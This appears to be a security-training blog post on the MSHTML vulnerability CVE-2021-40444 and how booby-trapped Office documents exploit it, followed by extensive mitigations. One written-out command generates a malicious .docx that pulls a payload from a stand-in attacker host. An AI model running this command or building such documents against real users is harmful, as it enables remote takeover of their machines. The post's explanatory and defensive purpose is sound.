Ready to Start Your Career?

How Attackers Use MSHTML For Remote Code Execution

Vijay Maripi's profile image

By: Vijay Maripi

January 27, 2022

Overview of MSHTML Vulnerability

MSHTML is an acronym for Microsoft HTML Engine and interfaces, and this is a browser engine that comes with Windows, both personal computers and servers. The security flaw can be found in almost any device that runs with Windows operating system.

The CVE-2021-40444, also known as the MSHTML Engine Remote Code Execution vulnerability, allows attackers to execute arbitrary code on vulnerable systems by improperly processing registered file extensions in such a way that it incorrectly parses. Attackers can reliably exploit it by giving carefully constructed paths, as it will parse arbitrary file types regardless of whether they are "unsafe" by design without notifying.

Microsoft Threat Intelligence Center (MSTIC) found a small number of attacks (less than 10) in September 2021 that attempted to attack a remote code execution vulnerability in MSHTML using specially designed Microsoft Office documents. The vulnerability, CVE-2021-40444, was leveraged in these attacks as part of an initial access campaign that included bespoke Cobalt Strike Beacon loaders. These loaders have been linked to several cybercriminal schemes, including ransomware that humans administer.

How does the MSHTML (CVE-2021-40444) attack work?

The CVE-2021-40444 allows an attacker to execute arbitrary code on a victim's PC via an ActiveX control typically delivered via spear-phishing. An attacker can implement it to develop a malicious ActiveX component used by the browser rendering engine in a Microsoft Office document. The threat actor must then persuade the victim to open the infected document. The vulnerability is exploited when the user opens the document, allowing the attacker to run arbitrary code.

The newly discovered zero-day vulnerability is a critical risk flaw in the Trident MSHTML rendering engine. The malicious actors are targeting and attacking Office 365 on a variety of operating systems and Office 2019 on Windows 10. This exploit is a highly complex attack that uses ActiveX controls and .cpl files.

First and foremost, attackers must create a malicious Microsoft Office document file. They achieve this by creating a standard one first. To generate the malicious use the following python program:

A malicious Docx file will be generated using the command: "python3 generate exploit/calc.dll https://attacker_ip" After that, it can be sent to the victim. Suppose the target downloads the exploit file and evades any mitigation, resulting in the download and execution of a malicious file on the affected PC.

The Metasploit module can also be leveraged to generate a malicious Docx file. For example, the following module generates it. This security flaw exists because an attacker can create a malicious ActiveX control by a Docx file(Microsoft Office document) that includes the browser rendering engine.

Metasploit Module:

Learn more about Microsoft Office Word MSHTML Remote Code Execution exploitation and mitigation, refer to:

Mitigation strategies for CVE-2021-40444

Microsoft Office opens internet-sourced documents in Protected View or Application Guard for Office. Both can prevent the current exploit scenario.

  • Microsoft Word Protected View: Files downloaded from the Internet or other potentially dangerous sources may contain worms, viruses, or different types of malware that might harm the computer. Files from potentially unsafe locations are opened as read-only or in Protected View to help protect your computer. Anyone can read a file, see its contents, and edit it while reducing the risk by utilizing Protected View.

  • Application Guard for Office: A secure container segregated from the rest of your data using hardware-based virtualization. When Office opens files in Application Guard, instead of Protected View, you can safely view, save, modify, and print these files without reopening them outside the container. Untrusted documents are isolated in Application Guard for Office, which prevents them from accessing untrusted corporate resources or arbitrary files on the machine.

  • Endpoint Detection and Response: Run EDR in block mode to provide an extra layer of protection from malicious artifacts when Microsoft defender is not a primary antivirus product and is running in passive mode. Endpoint detection in block mode works in the background to remove unknown artifacts detected by EDR capabilities. Such artifacts may have gone undetected by the primary, non-Microsoft antivirus product. Devices or systems running Microsoft defender as the primary antivirus, EDR in block mode provides defense by allowing the antivirus to take automatic actions on post-breach, behavioral EDR detections.

  • Device Discovery: Microsoft Defender for Endpoint includes a device discovery feature that allows you to locate unmaintained devices connected to your corporate network without the need for additional appliances or time-consuming process changes. Device discovery collects, probes, or scans your network using onboarded endpoints to discover unmanaged devices.

  • Tamper Protection: To prevent malicious modifications to security settings, enable tamper protection in Microsoft Defender for Endpoint.

Microsoft Defender for Endpoint users can enable the "BlockOfficeCreateProcessRule" attack surface reduction rule, which prevents Office programs from establishing child processes. A popular malware tactic is to create malicious child processes.

Other workarounds to stop attackers from MSHTML RCE

  • Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect and protect the known vulnerability. Users should update their antimalware software. Those who use automatic updates don't need to do anything else. Customers who handle updates in their organizations should choose detection to build 1.349.22.0 or newer and distribute it across their environments. "Suspicious Cpl File Execution" will appear in Microsoft Defender for Endpoint warnings.

  • MSHTML RCE can be mitigated by disabling the installation of all ActiveX controls in Internet Explorer. Disabling the installation of all Activex controls can be done for all sites by using your Local Group Policy Editor to configure the Group Policy or by changing the registry. ActiveX controls that were previously installed will continue to function, but they will not expose this vulnerability.

  • Take advantage of regular security upgrades by using a compatible platform, Windows 10.

  • Make sure your devices and operating systems are up to date. Set up automatic updates or install the most recent security updates as soon as they are available.

Incident response steps to take when an incident occurs in the company:

Microsoft is looking into reports that MSHTML has a remote code execution vulnerability. Additionally, Microsoft is aware of attack vectors that use specially designed Microsoft Office documents to exploit CVE-2021-40444.

Schedule Demo